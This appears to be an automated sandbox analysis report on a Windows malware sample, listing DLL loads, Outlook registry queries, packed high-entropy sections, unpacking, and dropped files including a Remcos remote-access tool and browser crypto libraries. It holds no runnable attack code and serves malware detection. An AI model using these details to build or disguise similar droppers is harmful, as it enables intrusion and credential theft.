Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: iphlpapi.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 2163712 > 1048576

Source: file.exe

Static PE information: Raw size of rswsxqeb is bigger than: 0x100000 < 0x1a5200

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2013330037.000000006F8ED000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1669066105.00000000051FB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2013089860.000000006CEF1000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1988015001.000000000079C000.00000040.00000001.01000000.00000003.sdmp, ed55d3f620.exe, 0000001A.00000002.2855529774.0000000005CCC000.00000040.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2794443992.000000000820B000.00000004.00001000.00020000.00000000.sdmp, c2a8de8bf3.exe, 0000001C.00000003.2576226521.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, c2a8de8bf3.exe, 0000001C.00000002.2629001763.000000000041C000.00000040.00000001.01000000.00000016.sdmp, ed55d3f620.exe, 0000001E.00000002.2908134178.0000000005F1C000.00000040.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2858928335.000000000831B000.00000004.00001000.00020000.00000000.sdmp, c2a8de8bf3.exe, 00000020.00000003.2738544511.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, c2a8de8bf3.exe, 00000020.00000002.2791492042.000000000041C000.00000040.00000001.01000000.00000016.sdmp
Source:	Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1669066105.00000000051FB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2013089860.000000006CEF1000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1988015001.000000000079C000.00000040.00000001.01000000.00000003.sdmp, ed55d3f620.exe, 0000001A.00000002.2855529774.0000000005CCC000.00000040.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2794443992.000000000820B000.00000004.00001000.00020000.00000000.sdmp, c2a8de8bf3.exe, 0000001C.00000003.2576226521.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, c2a8de8bf3.exe, 0000001C.00000002.2629001763.000000000041C000.00000040.00000001.01000000.00000016.sdmp, ed55d3f620.exe, 0000001E.00000002.2908134178.0000000005F1C000.00000040.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2858928335.000000000831B000.00000004.00001000.00020000.00000000.sdmp, c2a8de8bf3.exe, 00000020.00000003.2738544511.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, c2a8de8bf3.exe, 00000020.00000002.2791492042.000000000041C000.00000040.00000001.01000000.00000016.sdmp
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 315ef68721.exe, 0000001F.00000003.2680481772.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, 315ef68721.exe, 0000001F.00000002.2820728591.0000000000F62000.00000040.00000001.01000000.00000017.sdmp, 315ef68721.exe, 00000021.00000002.2868195242.0000000000F62000.00000040.00000001.01000000.00000017.sdmp, 315ef68721.exe, 00000021.00000003.2824289986.00000000047A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2013330037.000000006F8ED000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.770000.0.unpack :EW;.rsrc :W;.idata :W; :EW;rswsxqeb:EW;ekqrsvgt:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;rswsxqeb:EW;ekqrsvgt:EW;.taggant:EW;
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Unpacked PE file: 9.2.DocumentsFHIEBKKFHI.exe.8b0000.0.unpack :EW;.rsrc:W;.idata :W;lyrqextr:EW;gmycikna:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;lyrqextr:EW;gmycikna:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 10.2.skotes.exe.b20000.0.unpack :EW;.rsrc:W;.idata :W;lyrqextr:EW;gmycikna:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;lyrqextr:EW;gmycikna:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 11.2.skotes.exe.b20000.0.unpack :EW;.rsrc:W;.idata :W;lyrqextr:EW;gmycikna:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;lyrqextr:EW;gmycikna:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Unpacked PE file: 12.2.remcos_a.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zncloxxx:EW;sftjullu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zncloxxx:EW;sftjullu:EW;.taggant:EW;
Source: C:\ProgramData\Remcos\remcos.exe	Unpacked PE file: 13.2.remcos.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zncloxxx:EW;sftjullu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zncloxxx:EW;sftjullu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Unpacked PE file: 26.2.ed55d3f620.exe.b60000.0.unpack :EW;.rsrc:W;.idata :W;xdlmaljh:EW;lyfosorw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;xdlmaljh:EW;lyfosorw:EW;.taggant:EW;
Source: C:\ProgramData\Remcos\remcos.exe	Unpacked PE file: 27.2.remcos.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zncloxxx:EW;sftjullu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zncloxxx:EW;sftjullu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Unpacked PE file: 28.2.c2a8de8bf3.exe.3f0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;rswsxqeb:EW;ekqrsvgt:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;rswsxqeb:EW;ekqrsvgt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Unpacked PE file: 30.2.ed55d3f620.exe.b60000.0.unpack :EW;.rsrc:W;.idata :W;xdlmaljh:EW;lyfosorw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;xdlmaljh:EW;lyfosorw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Unpacked PE file: 31.2.315ef68721.exe.f60000.0.unpack :EW;.rsrc:W;.idata :W;mnhiavry:EW;gxujdorj:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Unpacked PE file: 32.2.c2a8de8bf3.exe.3f0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;rswsxqeb:EW;ekqrsvgt:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;rswsxqeb:EW;ekqrsvgt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Unpacked PE file: 33.2.315ef68721.exe.f60000.0.unpack :EW;.rsrc:W;.idata :W;mnhiavry:EW;gxujdorj:EW;.taggant:EW; vs :ER;.rsrc:W;

Source: buildd[1].exe.11.dr

Static PE information: 0xE480C158 [Mon Jun 25 20:55:52 2091 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: ed55d3f620.exe.11.dr	Static PE information: real checksum: 0x3039a3 should be: 0x3049d6
Source: c2a8de8bf3.exe.11.dr	Static PE information: real checksum: 0x21c366 should be: 0x21787c
Source: remcos_a.exe.11.dr	Static PE information: real checksum: 0x1e5f11 should be: 0x1e9eca
Source: random[1].exe0.11.dr	Static PE information: real checksum: 0x3039a3 should be: 0x3049d6
Source: random[1].exe.0.dr	Static PE information: real checksum: 0x2a4a52 should be: 0x2ad4f4
Source: remcos_a[1].exe.11.dr	Static PE information: real checksum: 0x1e5f11 should be: 0x1e9eca
Source: remcos.exe.12.dr	Static PE information: real checksum: 0x1e5f11 should be: 0x1e9eca
Source: random[1].exe.11.dr	Static PE information: real checksum: 0x21c366 should be: 0x21787c
Source: DocumentsFHIEBKKFHI.exe.0.dr	Static PE information: real checksum: 0x3149db should be: 0x3214d8
Source: chrome.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0xb0b18
Source: file.exe	Static PE information: real checksum: 0x21c366 should be: 0x21787c
Source: skotes.exe.9.dr	Static PE information: real checksum: 0x3149db should be: 0x3214d8
Source: 315ef68721.exe.11.dr	Static PE information: real checksum: 0x2a4a52 should be: 0x2ad4f4
Source: buildd[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x2f4ed
Source: buildd.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x2f4ed

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: rswsxqeb
Source: file.exe	Static PE information: section name: ekqrsvgt
Source: file.exe	Static PE information: section name: .taggant
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: DocumentsFHIEBKKFHI.exe.0.dr	Static PE information: section name:
Source: DocumentsFHIEBKKFHI.exe.0.dr	Static PE information: section name: .idata
Source: DocumentsFHIEBKKFHI.exe.0.dr	Static PE information: section name: lyrqextr
Source: DocumentsFHIEBKKFHI.exe.0.dr	Static PE information: section name: gmycikna
Source: DocumentsFHIEBKKFHI.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name: mnhiavry
Source: random[1].exe.0.dr	Static PE information: section name: gxujdorj
Source: random[1].exe.0.dr	Static PE information: section name: .taggant
Source: skotes.exe.9.dr	Static PE information: section name:
Source: skotes.exe.9.dr	Static PE information: section name: .idata
Source: skotes.exe.9.dr	Static PE information: section name: lyrqextr
Source: skotes.exe.9.dr	Static PE information: section name: gmycikna
Source: skotes.exe.9.dr	Static PE information: section name: .taggant
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: .rsrc
Source: random[1].exe.11.dr	Static PE information: section name: .idata
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: rswsxqeb
Source: random[1].exe.11.dr	Static PE information: section name: ekqrsvgt
Source: random[1].exe.11.dr	Static PE information: section name: .taggant
Source: c2a8de8bf3.exe.11.dr	Static PE information: section name:
Source: c2a8de8bf3.exe.11.dr	Static PE information: section name: .rsrc
Source: c2a8de8bf3.exe.11.dr	Static PE information: section name: .idata
Source: c2a8de8bf3.exe.11.dr	Static PE information: section name:
Source: c2a8de8bf3.exe.11.dr	Static PE information: section name: rswsxqeb
Source: c2a8de8bf3.exe.11.dr	Static PE information: section name: ekqrsvgt
Source: c2a8de8bf3.exe.11.dr	Static PE information: section name: .taggant
Source: 315ef68721.exe.11.dr	Static PE information: section name:
Source: 315ef68721.exe.11.dr	Static PE information: section name: .idata
Source: 315ef68721.exe.11.dr	Static PE information: section name: mnhiavry
Source: 315ef68721.exe.11.dr	Static PE information: section name: gxujdorj
Source: 315ef68721.exe.11.dr	Static PE information: section name: .taggant
Source: remcos_a[1].exe.11.dr	Static PE information: section name:
Source: remcos_a[1].exe.11.dr	Static PE information: section name: .idata
Source: remcos_a[1].exe.11.dr	Static PE information: section name:
Source: remcos_a[1].exe.11.dr	Static PE information: section name: zncloxxx
Source: remcos_a[1].exe.11.dr	Static PE information: section name: sftjullu
Source: remcos_a[1].exe.11.dr	Static PE information: section name: .taggant
Source: remcos_a.exe.11.dr	Static PE information: section name:
Source: remcos_a.exe.11.dr	Static PE information: section name: .idata
Source: remcos_a.exe.11.dr	Static PE information: section name:
Source: remcos_a.exe.11.dr	Static PE information: section name: zncloxxx
Source: remcos_a.exe.11.dr	Static PE information: section name: sftjullu
Source: remcos_a.exe.11.dr	Static PE information: section name: .taggant
Source: random[1].exe0.11.dr	Static PE information: section name:
Source: random[1].exe0.11.dr	Static PE information: section name: .idata
Source: random[1].exe0.11.dr	Static PE information: section name: xdlmaljh
Source: random[1].exe0.11.dr	Static PE information: section name: lyfosorw
Source: random[1].exe0.11.dr	Static PE information: section name: .taggant
Source: ed55d3f620.exe.11.dr	Static PE information: section name:
Source: ed55d3f620.exe.11.dr	Static PE information: section name: .idata
Source: ed55d3f620.exe.11.dr	Static PE information: section name: xdlmaljh
Source: ed55d3f620.exe.11.dr	Static PE information: section name: lyfosorw
Source: ed55d3f620.exe.11.dr	Static PE information: section name: .taggant
Source: remcos.exe.12.dr	Static PE information: section name:
Source: remcos.exe.12.dr	Static PE information: section name: .idata
Source: remcos.exe.12.dr	Static PE information: section name:
Source: remcos.exe.12.dr	Static PE information: section name: zncloxxx
Source: remcos.exe.12.dr	Static PE information: section name: sftjullu
Source: remcos.exe.12.dr	Static PE information: section name: .taggant

Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Code function: 9_2_008CD91C push ecx; ret	9_2_008CD92F
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Code function: 9_2_008C1359 push es; ret	9_2_008C135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00B3D91C push ecx; ret	10_2_00B3D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00B3D91C push ecx; ret	11_2_00B3D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00B5DEDB push ss; iretd	11_2_00B5DEDC
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00B3DFC6 push ecx; ret	11_2_00B3DFD9

Source: file.exe	Static PE information: section name: rswsxqeb entropy: 7.952971559780101
Source: DocumentsFHIEBKKFHI.exe.0.dr	Static PE information: section name: entropy: 7.085273041264643
Source: random[1].exe.0.dr	Static PE information: section name: entropy: 7.789563755347752
Source: skotes.exe.9.dr	Static PE information: section name: entropy: 7.085273041264643
Source: random[1].exe.11.dr	Static PE information: section name: rswsxqeb entropy: 7.952971559780101
Source: c2a8de8bf3.exe.11.dr	Static PE information: section name: rswsxqeb entropy: 7.952971559780101
Source: 315ef68721.exe.11.dr	Static PE information: section name: entropy: 7.789563755347752
Source: remcos_a[1].exe.11.dr	Static PE information: section name: entropy: 7.978735136531938
Source: remcos_a[1].exe.11.dr	Static PE information: section name: zncloxxx entropy: 7.9436654441344325
Source: remcos_a.exe.11.dr	Static PE information: section name: entropy: 7.978735136531938
Source: remcos_a.exe.11.dr	Static PE information: section name: zncloxxx entropy: 7.9436654441344325
Source: random[1].exe0.11.dr	Static PE information: section name: entropy: 7.128927242825522
Source: ed55d3f620.exe.11.dr	Static PE information: section name: entropy: 7.128927242825522
Source: remcos.exe.12.dr	Static PE information: section name: entropy: 7.978735136531938
Source: remcos.exe.12.dr	Static PE information: section name: zncloxxx entropy: 7.9436654441344325

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsFHIEBKKFHI.exe

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\chrome.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
